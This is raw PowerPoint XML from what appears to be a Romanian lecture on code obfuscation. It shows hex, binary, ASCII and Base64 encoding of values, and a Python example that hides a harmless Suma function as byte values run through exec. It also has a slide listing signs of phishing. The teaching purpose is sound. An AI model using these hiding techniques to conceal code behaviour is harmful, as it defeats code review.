            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="2180496"/>
            <a:ext cx="11029615" cy="4154990"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Conversia în Hexadecimal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Convertește valorile în reprezentarea lor hexadecimală. Această metodă este utilă pentru ascunderea stringurilor sau valorilor numerice directe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exemplu (javascript):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    Original: let age = 27;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    Ofuscat: let age = 0x1B; // 27 în hexadecimal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Conversia din Hexadecimal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Procesul invers, unde valorile hexadecimale sunt convertite înapoi în valorile lor originale în timpul execuției.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exemplu (javascript):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>let age = parseInt('0x1B');</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08711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 - transformari</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="2180496"/>
            <a:ext cx="11029615" cy="4358190"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Conversia în Binar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Reprezentarea valorilor folosind sistemul binar. Aceasta poate fi folosită pentru a ascunde numerele prin ofuscare.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exemplu:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    Original: let flag = true;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    Ofuscat: let flag = !!0b1; // true, reprezentat ca binar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Conversia din Binar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Conversia valorilor binare înapoi în formatul lor original sau utilizabil.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exemplu:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>javascript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>let flag = Boolean(0b1); // Converteste din binar în boolean</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79784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 - transformari</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472335" y="1911983"/>
            <a:ext cx="11029615" cy="4793618"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Folosirea Codului ASCII</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Folosirea codurilor ASCII pentru a reprezenta caracterele, ascunzând astfel stringurile.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exemplu:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    Original: console.log("OK");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    Ofuscat: console.log(String.fromCharCode(79, 75)); // "OK" folosind codurile ASCII</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Conversia între Baze Numerice</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Utilizarea diferitelor baze numerice (de exemplu, octal, decimal, binar, hexadecimal) pentru a reprezenta valori, complicând înțelegerea imediată a codului.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exemplu decimal în binary (javascript):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>let num = (10).toString(2); // "1010", reprezentarea binară a numărului 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hexadecimal în decimal (javascript):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>let num = parseInt('A', 16); // 10, conversia valorii hexadecimale 'A' în decimal</a:t>
            </a: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335376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prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ofruscarea</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alte tehnici de ofuscare - transformari</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="2180496"/>
            <a:ext cx="11029615" cy="4234818"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encodarea Stringurilor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Utilizarea diferitelor scheme de codare (de exemplu, Base64) pentru a ofusca stringurile.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exemplu:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    Original: let secret = "Password";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    Ofuscat: let secret = btoa("Password"); // Encodare Base64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Decodarea Stringurilor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Decodarea stringurilor codate în timpul execuției pentru a le folosi în logică.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exemplu (javascript):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>let secret = atob("UGFzc3dvcmQ="); // "Password", decodare din Base64 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>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909952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Ofruscarea</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>exemplu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>y = “text”.length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>x = 3+y-7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>J_dDs = “.|0”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ddFsoUs = “J4b2Fk_”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>tEX13boo0 = “text”.length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>O0ooO= J_dDs.length+tEX13boo0-ddFsoUs.length</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089932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ofruscarea</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ofruscarea poate fi funcționala și ușor de citit de om </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(dead code in clar)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ofruscarea poate fi nefuncționala și funcționala în anumite condiții </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(criptare - nefunctionala; decriptare prin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> – functionala)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3919334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Pishing</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Puncte de atenție pentru identificarea phishing-ului:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="2180496"/>
            <a:ext cx="11029615" cy="4296504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>URL-ul Suspect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Chiar dacă URL-ul poate părea legitim la prima vedere, trecând cu mouse-ul peste link (fără a face clic) în majoritatea clienților de email sau browserelor îți va arăta adresa reală la care vei fi direcționat. Adesea, aceste adrese sunt similare cu cele reale, dar cu diferențe minore care le trădează ca fiind false.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Solicitări Urgente</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Phisherii adesea încearcă să creeze un sentiment de urgență sau panică pentru a te determina să acționezi rapid, fără a te gândi.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Cererea de Informații Personale</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Băncile și alte instituții financiare nu îți vor cere niciodată să furnizezi informații personale sensibile printr-un email sau printr-un link trimis prin email.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Greșeli Gramaticale sau de Tipărire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Deși nu întotdeauna prezente, mesajele de phishing pot conține erori care nu sunt caracteristice comunicărilor oficiale.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Flowchart: Process 3"/>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293165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96108-760B-8CD6-14C9-99A3674EA20F}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Flowchart: Process 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95B7962E-CB32-2710-C417-31BCDA3E644B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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0AAF17-2095-0258-09C0-70EDA6CC5224}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ofruscarea</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>criptare vs executie dinamica</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C775C48A-D670-9EFE-EE44-E80F05E99C48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1040296" y="2603105"/>
            <a:ext cx="6096000" cy="3456524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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0x67</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0x54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0x62</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0x6F</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859900"/>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effectLst/>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chr</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exec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Suma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A56AD70-258C-26E0-B5ED-1DBA14DD8C49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6230427" y="2520199"/>
            <a:ext cx="5082208" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Acest exemplu arată cum codul poate fi ascuns sub forma unei liste de valori numerice, care sunt transformate la rulare în caractere și apoi executate cu exec. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>În loc ca funcția să fie vizibilă direct în sursă, ea devine lizibilă doar în momentul execuției. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Astfel se obține o formă de camuflaj simplu, utilizată frecvent în limbaje de scripting pentru ascunderea sau comprimarea codului. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>În cazul prezentat, codul ascuns definește funcția Suma(x,y,z), care returnează rezultatul adunării celor trei argumente și produce valoarea 6 atunci când este apelată.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BD25C2E-B00E-C16D-19F9-F5DD5DF09765}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9919252" y="1460196"/>
            <a:ext cx="1868557" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execuția dinamică</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Speech Bubble: Rectangle with Corners Rounded 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DCF054D-3EFF-9E0B-5A1F-524D1DBD39C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3425687" y="4750903"/>
            <a:ext cx="2219739" cy="1133061"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -127041"/>
              <a:gd name="adj2" fmla="val 3094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def Suma(x, y, z):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>    return x + y + z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2567730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78973-BB46-F413-6B08-A8A26E756839}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Flowchart: Process 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28842683-71FD-E217-DD4B-1A300DEDDCFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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983247-0F0D-8611-85B1-B427E5FAAD82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ofruscarea</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>criptare vs executie dinamica</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34F32674-0D92-843B-0871-DE06A702352A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="748748" y="2262330"/>
            <a:ext cx="9004852" cy="3991029"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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buf</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0x67</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0x68</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0x5D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0x2F</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0x5D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0x68</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0x77</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0x78</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0x5D</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0x67</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0x70</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0x46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0x70</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0x65</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0x2A</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0x0E</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0x0B</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0x66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0x06</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0x29</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0x74</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0x33</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0x2A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859900"/>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effectLst/>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buf</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chr</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exec</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000">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>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effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>s</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effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
